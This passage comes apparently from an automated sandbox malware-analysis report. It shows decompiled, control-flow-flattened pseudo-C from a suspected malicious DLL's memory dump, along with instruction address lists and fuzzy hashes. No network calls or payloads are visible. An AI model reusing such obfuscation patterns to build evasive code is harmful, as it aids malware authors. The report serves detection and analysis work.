                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                            				_v76 = 0x201aab;
                                                                                                                                                                            				_t234 = 0x76;
                                                                                                                                                                            				_v76 = _v76 / _t234;
                                                                                                                                                                            				_v76 = _v76 + 0xe408;
                                                                                                                                                                            				_t235 = 0xc;
                                                                                                                                                                            				_v76 = _v76 * 0x38;
                                                                                                                                                                            				_v76 = _v76 ^ 0x004fdd99;
                                                                                                                                                                            				_v44 = 0xd502f1;
                                                                                                                                                                            				_v44 = _v44 | 0x910f8184;
                                                                                                                                                                            				_v44 = _v44 / _t235;
                                                                                                                                                                            				_v44 = _v44 ^ 0x0c2ba140;
                                                                                                                                                                            				_v48 = 0xe41bd4;
                                                                                                                                                                            				_v48 = _v48 ^ 0x89eac382;
                                                                                                                                                                            				_t236 = 0x67;
                                                                                                                                                                            				_v48 = _v48 / _t236;
                                                                                                                                                                            				_v48 = _v48 ^ 0x015e526e;
                                                                                                                                                                            				_v24 = 0xf49d06;
                                                                                                                                                                            				_v24 = _v24 | 0x486b4754;
                                                                                                                                                                            				_v24 = _v24 ^ 0x48f37dd9;
                                                                                                                                                                            				_v88 = 0xd25a8e;
                                                                                                                                                                            				_v88 = _v88 ^ 0x0de03e2c;
                                                                                                                                                                            				_v88 = _v88 >> 8;
                                                                                                                                                                            				_t237 = 0x57;
                                                                                                                                                                            				_v88 = _v88 / _t237;
                                                                                                                                                                            				_v88 = _v88 ^ 0x00057327;
                                                                                                                                                                            				_v32 = 0x480afd;
                                                                                                                                                                            				_v32 = _v32 ^ 0x00453f61;
                                                                                                                                                                            				_v60 = 0x165baf;
                                                                                                                                                                            				_v60 = _v60 << 0xa;
                                                                                                                                                                            				_v60 = _v60 ^ 0xd8cf9c31;
                                                                                                                                                                            				_v60 = _v60 ^ 0x81a5172b;
                                                                                                                                                                            				_v84 = 0x2fcd58;
                                                                                                                                                                            				_v84 = _v84 + 0x335f;
                                                                                                                                                                            				_v84 = _v84 + 0xffff6358;
                                                                                                                                                                            				_v84 = _v84 << 9;
                                                                                                                                                                            				_v84 = _v84 ^ 0x5ec42bb0;
                                                                                                                                                                            				_v40 = 0xbc2783;
                                                                                                                                                                            				_v40 = _v40 + 0xffff2ae1;
                                                                                                                                                                            				_t238 = 0xa;
                                                                                                                                                                            				_v40 = _v40 * 0x5e;
                                                                                                                                                                            				_v40 = _v40 ^ 0x44c8bdaa;
                                                                                                                                                                            				_v72 = 0xc9404f;
                                                                                                                                                                            				_v72 = _v72 | 0xfaaf7fa5;
                                                                                                                                                                            				_v72 = _v72 / _t238;
                                                                                                                                                                            				_v72 = _v72 >> 0xc;
                                                                                                                                                                            				_v72 = _v72 ^ 0x000be8dc;
                                                                                                                                                                            				_v56 = 0xcb8585;
                                                                                                                                                                            				_v56 = _v56 >> 6;
                                                                                                                                                                            				_v56 = _v56 ^ 0xa4d175a3;
                                                                                                                                                                            				_v56 = _v56 ^ 0xa4d4e9a5;
                                                                                                                                                                            				_v28 = 0xfbd7ad;
                                                                                                                                                                            				_v28 = _v28 + 0xffffc7a7;
                                                                                                                                                                            				_v28 = _v28 ^ 0x00f429b0;
                                                                                                                                                                            				_v80 = 0x6cf7c4;
                                                                                                                                                                            				_v80 = _v80 << 0xb;
                                                                                                                                                                            				_v80 = _v80 ^ 0xc9851cf7;
                                                                                                                                                                            				_v80 = _v80 + 0xe116;
                                                                                                                                                                            				_v80 = _v80 ^ 0xae3f2149;
                                                                                                                                                                            				_v52 = 0xd995b1;
                                                                                                                                                                            				_v52 = _v52 + 0x112b;
                                                                                                                                                                            				_v52 = _v52 + 0xffff70e0;
                                                                                                                                                                            				_v52 = _v52 ^ 0x00d4086e;
                                                                                                                                                                            				_v64 = 0x3e6f55;
                                                                                                                                                                            				_v64 = _v64 ^ 0x64233eb3;
                                                                                                                                                                            				_v64 = _v64 + 0xfffff8c9;
                                                                                                                                                                            				_v64 = _v64 + 0xffffb5e5;
                                                                                                                                                                            				_v64 = _v64 ^ 0x64179829;
                                                                                                                                                                            				_v68 = 0x30eb6c;
                                                                                                                                                                            				_t239 = 0x37;
                                                                                                                                                                            				_v68 = _v68 / _t239;
                                                                                                                                                                            				_v68 = _v68 + 0xffffeee1;
                                                                                                                                                                            				_v68 = _v68 >> 0xa;
                                                                                                                                                                            				_v68 = _v68 ^ 0x000816d3;
                                                                                                                                                                            				_v20 = 0x71a516;
                                                                                                                                                                            				_v20 = _v20 | 0x2f4429e5;
                                                                                                                                                                            				_v20 = _v20 ^ 0x2f784372;
                                                                                                                                                                            				_v36 = 0xda1832;
                                                                                                                                                                            				_v36 = _v36 * 0x4c;
                                                                                                                                                                            				_v36 = _v36 + 0xffff5a89;
                                                                                                                                                                            				_v36 = _v36 ^ 0x40b976b8;
                                                                                                                                                                            				goto L1;
                                                                                                                                                                            				do {
                                                                                                                                                                            					while(1) {
                                                                                                                                                                            						L1:
                                                                                                                                                                            						_t246 = _t216 - 0x68b8c0f;
                                                                                                                                                                            						if(_t246 > 0) {
                                                                                                                                                                            							break;
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_t246 == 0) {
                                                                                                                                                                            							_t216 = 0xe6264d6;
                                                                                                                                                                            							continue;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							if(_t216 == 0x8a1c17) {
                                                                                                                                                                            								_push(_t216);
                                                                                                                                                                            								_t202 = E02F607F0();
                                                                                                                                                                            								_t243 =  &(_t243[1]);
                                                                                                                                                                            								_t216 = 0xf218af8;
                                                                                                                                                                            								_t241 = _t241 + _t202;
                                                                                                                                                                            								continue;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								if(_t216 == 0x50fe579) {
                                                                                                                                                                            									_t241 = _t241 + E02F6BE8C(_t214 + 0x2c, _v64, _v68, _v20, _v36);
                                                                                                                                                                            								} else {
                                                                                                                                                                            									if(_t216 == 0x530d654) {
                                                                                                                                                                            										_push(_t216);
                                                                                                                                                                            										_t207 = E02F607F0();
                                                                                                                                                                            										_t243 =  &(_t243[1]);
                                                                                                                                                                            										_t216 = 0x8a5806a;
                                                                                                                                                                            										_t241 = _t241 + _t207;
                                                                                                                                                                            										continue;
                                                                                                                                                                            									} else {
                                                                                                                                                                            										if(_t216 != 0x5e83455) {
                                                                                                                                                                            											goto L17;
                                                                                                                                                                            										} else {
                                                                                                                                                                            											_push(_t216);
                                                                                                                                                                            											_t210 = E02F607F0();
                                                                                                                                                                            											_t243 =  &(_t243[1]);
                                                                                                                                                                            											_t216 = 0x530d654;
                                                                                                                                                                            											_t241 = _t241 + _t210;
                                                                                                                                                                            											continue;
                                                                                                                                                                            										}
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						L20:
                                                                                                                                                                            						return _t241;
                                                                                                                                                                            					}
                                                                                                                                                                            					if(_t216 == 0x8a5806a) {
                                                                                                                                                                            						_push(_t216);
                                                                                                                                                                            						_t198 = E02F607F0();
                                                                                                                                                                            						_t243 =  &(_t243[1]);
                                                                                                                                                                            						_t216 = 0x8a1c17;
                                                                                                                                                                            						_t241 = _t241 + _t198;
                                                                                                                                                                            						goto L17;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						if(_t216 == 0xe6264d6) {
                                                                                                                                                                            							_t199 = E02F6BE8C(_t214 + 0x4c, _v76, _v44, _v48, _v24);
                                                                                                                                                                            							_t243 =  &(_t243[3]);
                                                                                                                                                                            							_t216 = 0x5e83455;
                                                                                                                                                                            							_t241 = _t241 + _t199;
                                                                                                                                                                            							goto L1;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							if(_t216 != 0xf218af8) {
                                                                                                                                                                            								goto L17;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_push(_t216);
                                                                                                                                                                            								_t213 = E02F607F0();
                                                                                                                                                                            								_t243 =  &(_t243[1]);
                                                                                                                                                                            								_t216 = 0x50fe579;
                                                                                                                                                                            								_t241 = _t241 + _t213;
                                                                                                                                                                            								goto L1;
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					goto L20;
                                                                                                                                                                            					L17:
                                                                                                                                                                            				} while (_t216 != 0x3fc4e73);
                                                                                                                                                                            				goto L20;
                                                                                                                                                                            			}








































                                                                                                                                                                            0x02f5f369
                                                                                                                                                                            0x02f5f36c
                                                                                                                                                                            0x02f5f380
                                                                                                                                                                            0x02f5f388
                                                                                                                                                                            0x02f5f38a
                                                                                                                                                                            0x02f5f38c
                                                                                                                                                                            0x02f5f38e
                                                                                                                                                                            0x02f5f38f
                                                                                                                                                                            0x02f5f390
                                                                                                                                                                            0x02f5f39c
                                                                                                                                                                            0x02f5f3a1
                                                                                                                                                                            0x02f5f3a7
                                                                                                                                                                            0x02f5f3b4
                                                                                                                                                                            0x02f5f3b7
                                                                                                                                                                            0x02f5f3bb
                                                                                                                                                                            0x02f5f3c3
                                                                                                                                                                            0x02f5f3cb
                                                                                                                                                                            0x02f5f3db
                                                                                                                                                                            0x02f5f3df
                                                                                                                                                                            0x02f5f3e7
                                                                                                                                                                            0x02f5f3ef
                                                                                                                                                                            0x02f5f3fb
                                                                                                                                                                            0x02f5f400
                                                                                                                                                                            0x02f5f406
                                                                                                                                                                            0x02f5f40e
                                                                                                                                                                            0x02f5f416
                                                                                                                                                                            0x02f5f41e
                                                                                                                                                                            0x02f5f426
                                                                                                                                                                            0x02f5f42e
                                                                                                                                                                            0x02f5f436
                                                                                                                                                                            0x02f5f43f
                                                                                                                                                                            0x02f5f444
                                                                                                                                                                            0x02f5f44a
                                                                                                                                                                            0x02f5f452
                                                                                                                                                                            0x02f5f462
                                                                                                                                                                            0x02f5f46a
                                                                                                                                                                            0x02f5f472
                                                                                                                                                                            0x02f5f477
                                                                                                                                                                            0x02f5f47f
                                                                                                                                                                            0x02f5f487
                                                                                                                                                                            0x02f5f48f
                                                                                                                                                                            0x02f5f497
                                                                                                                                                                            0x02f5f49f
                                                                                                                                                                            0x02f5f4a4
                                                                                                                                                                            0x02f5f4ac
                                                                                                                                                                            0x02f5f4b4
                                                                                                                                                                            0x02f5f4c1
                                                                                                                                                                            0x02f5f4c2
                                                                                                                                                                            0x02f5f4c6
                                                                                                                                                                            0x02f5f4ce
                                                                                                                                                                            0x02f5f4d6
                                                                                                                                                                            0x02f5f4e4
                                                                                                                                                                            0x02f5f4ea
                                                                                                                                                                            0x02f5f4ef
                                                                                                                                                                            0x02f5f4f7
                                                                                                                                                                            0x02f5f4ff
                                                                                                                                                                            0x02f5f504
                                                                                                                                                                            0x02f5f50c
                                                                                                                                                                            0x02f5f514
                                                                                                                                                                            0x02f5f51c
                                                                                                                                                                            0x02f5f524
                                                                                                                                                                            0x02f5f52c
                                                                                                                                                                            0x02f5f534
                                                                                                                                                                            0x02f5f539
                                                                                                                                                                            0x02f5f541
                                                                                                                                                                            0x02f5f549
                                                                                                                                                                            0x02f5f551
                                                                                                                                                                            0x02f5f559
                                                                                                                                                                            0x02f5f561
                                                                                                                                                                            0x02f5f569
                                                                                                                                                                            0x02f5f571
                                                                                                                                                                            0x02f5f579
                                                                                                                                                                            0x02f5f581
                                                                                                                                                                            0x02f5f589
                                                                                                                                                                            0x02f5f591
                                                                                                                                                                            0x02f5f599
                                                                                                                                                                            0x02f5f5a7
                                                                                                                                                                            0x02f5f5af
                                                                                                                                                                            0x02f5f5b3
                                                                                                                                                                            0x02f5f5bb
                                                                                                                                                                            0x02f5f5c0
                                                                                                                                                                            0x02f5f5c8
                                                                                                                                                                            0x02f5f5d0
                                                                                                                                                                            0x02f5f5d8
                                                                                                                                                                            0x02f5f5e0
                                                                                                                                                                            0x02f5f5ed
                                                                                                                                                                            0x02f5f5f1
                                                                                                                                                                            0x02f5f5f9
                                                                                                                                                                            0x02f5f5f9
                                                                                                                                                                            0x02f5f601
                                                                                                                                                                            0x02f5f601
                                                                                                                                                                            0x02f5f601
                                                                                                                                                                            0x02f5f601
                                                                                                                                                                            0x02f5f603
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5f605
                                                                                                                                                                            0x02f5f67d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5f607
                                                                                                                                                                            0x02f5f60d
                                                                                                                                                                            0x02f5f66b
                                                                                                                                                                            0x02f5f66c
                                                                                                                                                                            0x02f5f671
                                                                                                                                                                            0x02f5f674
                                                                                                                                                                            0x02f5f679
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5f60f
                                                                                                                                                                            0x02f5f615
                                                                                                                                                                            0x02f5f71a
                                                                                                                                                                            0x02f5f61b
                                                                                                                                                                            0x02f5f621
                                                                                                                                                                            0x02f5f651
                                                                                                                                                                            0x02f5f652
                                                                                                                                                                            0x02f5f657
                                                                                                                                                                            0x02f5f65a
                                                                                                                                                                            0x02f5f65f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5f623
                                                                                                                                                                            0x02f5f629
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5f62f
                                                                                                                                                                            0x02f5f637
                                                                                                                                                                            0x02f5f638
                                                                                                                                                                            0x02f5f63d
                                                                                                                                                                            0x02f5f640
                                                                                                                                                                            0x02f5f645
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5f645
                                                                                                                                                                            0x02f5f629
                                                                                                                                                                            0x02f5f621
                                                                                                                                                                            0x02f5f615
                                                                                                                                                                            0x02f5f60d
                                                                                                                                                                            0x02f5f71d
                                                                                                                                                                            0x02f5f725
                                                                                                                                                                            0x02f5f725
                                                                                                                                                                            0x02f5f687
                                                                                                                                                                            0x02f5f6e1
                                                                                                                                                                            0x02f5f6e2
                                                                                                                                                                            0x02f5f6e7
                                                                                                                                                                            0x02f5f6ea
                                                                                                                                                                            0x02f5f6ef
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5f689
                                                                                                                                                                            0x02f5f68b
                                                                                                                                                                            0x02f5f6c5
                                                                                                                                                                            0x02f5f6ca
                                                                                                                                                                            0x02f5f6cd
                                                                                                                                                                            0x02f5f6d2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5f68d
                                                                                                                                                                            0x02f5f693
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5f695
                                                                                                                                                                            0x02f5f69d
                                                                                                                                                                            0x02f5f69e
                                                                                                                                                                            0x02f5f6a3
                                                                                                                                                                            0x02f5f6a6
                                                                                                                                                                            0x02f5f6ab
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5f6ab
                                                                                                                                                                            0x02f5f693
                                                                                                                                                                            0x02f5f68b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5f6f1
                                                                                                                                                                            0x02f5f6f1
                                                                                                                                                                            0x00000000

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: ,>$Uo>$_3$a?E$l0$rCx/
                                                                                                                                                                            • API String ID: 0-1805074986
                                                                                                                                                                            • Opcode ID: aee53d98fdbd87342a85eaa3d07f56d671f8fcd94221aca7db3dcd7928f6070b
                                                                                                                                                                            • Instruction ID: 48ba2a7152feb731dfb4166a6752c6bc6008d23e14bd0b326f92d3a94d9655b3
                                                                                                                                                                            • Opcode Fuzzy Hash: aee53d98fdbd87342a85eaa3d07f56d671f8fcd94221aca7db3dcd7928f6070b
                                                                                                                                                                            • Instruction Fuzzy Hash: 3A9137B29083419BC358CF25D98941FBBF1FBD5758F144A2DFA8696260D7B6C9088F43
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                                            			E02F68806(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                            				char _v60;
                                                                                                                                                                            				intOrPtr _v64;
                                                                                                                                                                            				intOrPtr _v68;
                                                                                                                                                                            				intOrPtr _v72;
                                                                                                                                                                            				intOrPtr _v76;
                                                                                                                                                                            				signed int _v80;
                                                                                                                                                                            				signed int _v84;
                                                                                                                                                                            				signed int _v88;
                                                                                                                                                                            				signed int _v92;
                                                                                                                                                                            				signed int _v96;
                                                                                                                                                                            				signed int _v100;
                                                                                                                                                                            				signed int _v104;
                                                                                                                                                                            				signed int _v108;
                                                                                                                                                                            				signed int _v112;
                                                                                                                                                                            				signed int _v116;
                                                                                                                                                                            				signed int _v120;
                                                                                                                                                                            				signed int _v124;
                                                                                                                                                                            				signed int _v128;
                                                                                                                                                                            				signed int _v132;
                                                                                                                                                                            				signed int _v136;
                                                                                                                                                                            				signed int _v140;
                                                                                                                                                                            				void* _t156;
                                                                                                                                                                            				void* _t172;
                                                                                                                                                                            				void* _t174;
                                                                                                                                                                            				void* _t177;
                                                                                                                                                                            				void* _t182;
                                                                                                                                                                            				signed int _t183;
                                                                                                                                                                            				signed int _t184;
                                                                                                                                                                            				signed int _t185;
                                                                                                                                                                            				signed int _t186;
                                                                                                                                                                            				void* _t189;
                                                                                                                                                                            				intOrPtr _t216;
                                                                                                                                                                            				signed int* _t219;
                                                                                                                                                                            
                                                                                                                                                                            				_t215 = _a8;
                                                                                                                                                                            				_push(_a8);
                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                            				_push(__edx);
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				E02F6FE29(_t156);
                                                                                                                                                                            				_v76 = 0x923182;
                                                                                                                                                                            				_t219 =  &(( &_v140)[4]);
                                                                                                                                                                            				_v72 = 0xa31cb9;
                                                                                                                                                                            				_t216 = 0;
                                                                                                                                                                            				_v68 = 0;
                                                                                                                                                                            				_v64 = 0;
                                                                                                                                                                            				_t189 = 0xe0c62fa;
                                                                                                                                                                            				_v120 = 0x4473bb;
                                                                                                                                                                            				_t183 = 0x46;
                                                                                                                                                                            				_v120 = _v120 / _t183;
                                                                                                                                                                            				_v120 = _v120 << 6;
                                                                                                                                                                            				_v120 = _v120 ^ 0x003879f9;
                                                                                                                                                                            				_v100 = 0x40bbdb;
                                                                                                                                                                            				_t184 = 0x64;
                                                                                                                                                                            				_v100 = _v100 * 0x13;
                                                                                                                                                                            				_v100 = _v100 ^ 0x04c6e1a5;
                                                                                                                                                                            				_v140 = 0x8d0a20;
                                                                                                                                                                            				_v140 = _v140 * 0x6a;
                                                                                                                                                                            				_v140 = _v140 + 0x25b5;
                                                                                                                                                                            				_v140 = _v140 * 0x47;
                                                                                                                                                                            				_v140 = _v140 ^ 0x32607187;
                                                                                                                                                                            				_v84 = 0x381a9b;
                                                                                                                                                                            				_v84 = _v84 + 0xbdad;
                                                                                                                                                                            				_v84 = _v84 ^ 0x00352eaa;
                                                                                                                                                                            				_v124 = 0x2aec69;
                                                                                                                                                                            				_v124 = _v124 | 0x10e7a47b;
                                                                                                                                                                            				_v124 = _v124 ^ 0x113e433b;
                                                                                                                                                                            				_v124 = _v124 / _t184;
                                                                                                                                                                            				_v124 = _v124 ^ 0x000f1a56;
                                                                                                                                                                            				_v80 = 0x7d6845;
                                                                                                                                                                            				_v80 = _v80 + 0xffff13df;
                                                                                                                                                                            				_v80 = _v80 ^ 0x0079135d;
                                                                                                                                                                            				_v92 = 0x295f3e;
                                                                                                                                                                            				_v92 = _v92 + 0xbf8d;
                                                                                                                                                                            				_v92 = _v92 ^ 0x0026878e;
                                                                                                                                                                            				_v116 = 0x37f4f;
                                                                                                                                                                            				_v116 = _v116 << 6;
                                                                                                                                                                            				_v116 = _v116 + 0x3a5c;
                                                                                                                                                                            				_v116 = _v116 ^ 0x00effc52;
                                                                                                                                                                            				_v132 = 0xa2ba8e;
                                                                                                                                                                            				_v132 = _v132 + 0x1d0a;
                                                                                                                                                                            				_v132 = _v132 | 0x3462f83d;
                                                                                                                                                                            				_t185 = 0x33;
                                                                                                                                                                            				_v132 = _v132 * 0x30;
                                                                                                                                                                            				_v132 = _v132 ^ 0xea8b61c3;
                                                                                                                                                                            				_v128 = 0xc1a215;
                                                                                                                                                                            				_v128 = _v128 / _t185;
                                                                                                                                                                            				_v128 = _v128 | 0x8f52208d;
                                                                                                                                                                            				_v128 = _v128 + 0x2564;
                                                                                                                                                                            				_v128 = _v128 ^ 0x8f53844f;
                                                                                                                                                                            				_v108 = 0x49ebcc;
                                                                                                                                                                            				_v108 = _v108 * 0x2a;
                                                                                                                                                                            				_v108 = _v108 ^ 0x0c2cea59;
                                                                                                                                                                            				_v136 = 0x4a157a;
                                                                                                                                                                            				_t186 = 0x59;
                                                                                                                                                                            				_v136 = _v136 / _t186;
                                                                                                                                                                            				_v136 = _v136 >> 1;
                                                                                                                                                                            				_v136 = _v136 << 9;
                                                                                                                                                                            				_v136 = _v136 ^ 0x00dde8e3;
                                                                                                                                                                            				_v96 = 0x85f352;
                                                                                                                                                                            				_v96 = _v96 | 0xf8883f30;
                                                                                                                                                                            				_v96 = _v96 ^ 0xf88ae245;
                                                                                                                                                                            				_v104 = 0xc8529d;
                                                                                                                                                                            				_v104 = _v104 >> 8;
                                                                                                                                                                            				_v104 = _v104 ^ 0x00006ec5;
                                                                                                                                                                            				_v88 = 0xa01b;
                                                                                                                                                                            				_v88 = _v88 + 0xf4b;
                                                                                                                                                                            				_v88 = _v88 ^ 0x0002d8bd;
                                                                                                                                                                            				_v112 = 0x376510;
                                                                                                                                                                            				_v112 = _v112 >> 1;
                                                                                                                                                                            				_v112 = _v112 + 0x6895;
                                                                                                                                                                            				_v112 = _v112 ^ 0x001ca4c8;
                                                                                                                                                                            				do {
                                                                                                                                                                            					while(_t189 != 0x2d570bf) {
                                                                                                                                                                            						if(_t189 == 0x2e69388) {
                                                                                                                                                                            							_t174 = E02F72BF0(_v80,  &_v60, _v92, _v116, _t215 + 0xc);
                                                                                                                                                                            							_t219 =  &(_t219[3]);
                                                                                                                                                                            							__eflags = _t174;
                                                                                                                                                                            							if(__eflags != 0) {
                                                                                                                                                                            								_t189 = 0xed0c1fc;
                                                                                                                                                                            								continue;
                                                                                                                                                                            							}
                                                                                                                                                                            						} else {
                                                                                                                                                                            							if(_t189 == 0xa1356c9) {
                                                                                                                                                                            								_t177 = E02F72BF0(_v140,  &_v60, _v84, _v124, _t215 + 0x48);
                                                                                                                                                                            								_t219 =  &(_t219[3]);
                                                                                                                                                                            								__eflags = _t177;
                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                            									_t189 = 0x2e69388;
                                                                                                                                                                            									continue;
                                                                                                                                                                            								}
                                                                                                                                                                            							} else {
                                                                                                                                                                            								if(_t189 == 0xd5f0997) {
                                                                                                                                                                            									__eflags = E02F69D3E( &_v60, _v88, __eflags, _v112, _t215);
                                                                                                                                                                            									_t216 =  !=  ? 1 : _t216;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									if(_t189 == 0xe0c62fa) {
                                                                                                                                                                            										_t189 = 0xe1d6fcd;
                                                                                                                                                                            										continue;
                                                                                                                                                                            									} else {
                                                                                                                                                                            										if(_t189 == 0xe1d6fcd) {
                                                                                                                                                                            											E02F522A6(_a4, _v120,  &_v60, _v100);
                                                                                                                                                                            											_t219 =  &(_t219[2]);
                                                                                                                                                                            											_t189 = 0xa1356c9;
                                                                                                                                                                            											continue;
                                                                                                                                                                            										} else {
                                                                                                                                                                            											if(_t189 != 0xed0c1fc) {
                                                                                                                                                                            												goto L19;
                                                                                                                                                                            											} else {
                                                                                                                                                                            												_t182 = E02F72BF0(_v132,  &_v60, _v128, _v108, _t215 + 0x1c);
                                                                                                                                                                            												_t219 =  &(_t219[3]);
                                                                                                                                                                            												if(_t182 != 0) {
                                                                                                                                                                            													_t189 = 0x2d570bf;
                                                                                                                                                                            													continue;
                                                                                                                                                                            												}
                                                                                                                                                                            											}
                                                                                                                                                                            										}
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						L22:
                                                                                                                                                                            						return _t216;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t172 = E02F72BF0(_v136,  &_v60, _v96, _v104, _t215 + 0x3c);
                                                                                                                                                                            					_t219 =  &(_t219[3]);
                                                                                                                                                                            					__eflags = _t172;
                                                                                                                                                                            					if(__eflags == 0) {
                                                                                                                                                                            						_t189 = 0x63acd9;
                                                                                                                                                                            						goto L19;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t189 = 0xd5f0997;
                                                                                                                                                                            						continue;
                                                                                                                                                                            					}
                                                                                                                                                                            					goto L22;
                                                                                                                                                                            					L19:
                                                                                                                                                                            					__eflags = _t189 - 0x63acd9;
                                                                                                                                                                            				} while (__eflags != 0);
                                                                                                                                                                            				goto L22;
                                                                                                                                                                            			}




































                                                                                                                                                                            0x02f68810
                                                                                                                                                                            0x02f68817
                                                                                                                                                                            0x02f68818
                                                                                                                                                                            0x02f6881f
                                                                                                                                                                            0x02f68820
                                                                                                                                                                            0x02f68821
                                                                                                                                                                            0x02f68826
                                                                                                                                                                            0x02f6882e
                                                                                                                                                                            0x02f68831
                                                                                                                                                                            0x02f68839
                                                                                                                                                                            0x02f6883b
                                                                                                                                                                            0x02f68841
                                                                                                                                                                            0x02f68845
                                                                                                                                                                            0x02f6884a
                                                                                                                                                                            0x02f68858
                                                                                                                                                                            0x02f6885d
                                                                                                                                                                            0x02f68863
                                                                                                                                                                            0x02f68868
                                                                                                                                                                            0x02f68870
                                                                                                                                                                            0x02f6887d
                                                                                                                                                                            0x02f68880
                                                                                                                                                                            0x02f68884
                                                                                                                                                                            0x02f6888c
                                                                                                                                                                            0x02f68899
                                                                                                                                                                            0x02f6889d
                                                                                                                                                                            0x02f688aa
                                                                                                                                                                            0x02f688ae
                                                                                                                                                                            0x02f688b6
                                                                                                                                                                            0x02f688be
                                                                                                                                                                            0x02f688c6
                                                                                                                                                                            0x02f688ce
                                                                                                                                                                            0x02f688d6
                                                                                                                                                                            0x02f688de
                                                                                                                                                                            0x02f688ee
                                                                                                                                                                            0x02f688f2
                                                                                                                                                                            0x02f688fa
                                                                                                                                                                            0x02f68902
                                                                                                                                                                            0x02f6890a
                                                                                                                                                                            0x02f68912
                                                                                                                                                                            0x02f6891a
                                                                                                                                                                            0x02f68922
                                                                                                                                                                            0x02f6892a
                                                                                                                                                                            0x02f68932
                                                                                                                                                                            0x02f68937
                                                                                                                                                                            0x02f6893f
                                                                                                                                                                            0x02f68947
                                                                                                                                                                            0x02f6894f
                                                                                                                                                                            0x02f68957
                                                                                                                                                                            0x02f68964
                                                                                                                                                                            0x02f68965
                                                                                                                                                                            0x02f68969
                                                                                                                                                                            0x02f68971
                                                                                                                                                                            0x02f6897f
                                                                                                                                                                            0x02f68983
                                                                                                                                                                            0x02f6898b
                                                                                                                                                                            0x02f68993
                                                                                                                                                                            0x02f6899b
                                                                                                                                                                            0x02f689a8
                                                                                                                                                                            0x02f689ac
                                                                                                                                                                            0x02f689b4
                                                                                                                                                                            0x02f689c4
                                                                                                                                                                            0x02f689d1
                                                                                                                                                                            0x02f689d5
                                                                                                                                                                            0x02f689d9
                                                                                                                                                                            0x02f689de
                                                                                                                                                                            0x02f689e6
                                                                                                                                                                            0x02f689ee
                                                                                                                                                                            0x02f689f6
                                                                                                                                                                            0x02f689fe
                                                                                                                                                                            0x02f68a06
                                                                                                                                                                            0x02f68a0b
                                                                                                                                                                            0x02f68a13
                                                                                                                                                                            0x02f68a1b
                                                                                                                                                                            0x02f68a23
                                                                                                                                                                            0x02f68a2b
                                                                                                                                                                            0x02f68a33
                                                                                                                                                                            0x02f68a37
                                                                                                                                                                            0x02f68a3f
                                                                                                                                                                            0x02f68a47
                                                                                                                                                                            0x02f68a47
                                                                                                                                                                            0x02f68a51
                                                                                                                                                                            0x02f68b22
                                                                                                                                                                            0x02f68b27
                                                                                                                                                                            0x02f68b2a
                                                                                                                                                                            0x02f68b2c
                                                                                                                                                                            0x02f68b2e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f68b2e
                                                                                                                                                                            0x02f68a57
                                                                                                                                                                            0x02f68a5d
                                                                                                                                                                            0x02f68af7
                                                                                                                                                                            0x02f68afc
                                                                                                                                                                            0x02f68aff
                                                                                                                                                                            0x02f68b01
                                                                                                                                                                            0x02f68b07
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f68b07
                                                                                                                                                                            0x02f68a63
                                                                                                                                                                            0x02f68a69
                                                                                                                                                                            0x02f68b8c
                                                                                                                                                                            0x02f68b8e
                                                                                                                                                                            0x02f68a6f
                                                                                                                                                                            0x02f68a75
                                                                                                                                                                            0x02f68ad9
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f68a77
                                                                                                                                                                            0x02f68a7d
                                                                                                                                                                            0x02f68ac7
                                                                                                                                                                            0x02f68acc
                                                                                                                                                                            0x02f68acf
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f68a7f
                                                                                                                                                                            0x02f68a85
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f68a8b
                                                                                                                                                                            0x02f68a9f
                                                                                                                                                                            0x02f68aa4
                                                                                                                                                                            0x02f68aa9
                                                                                                                                                                            0x02f68aaf
                                                                                                                                                                            0x00000000
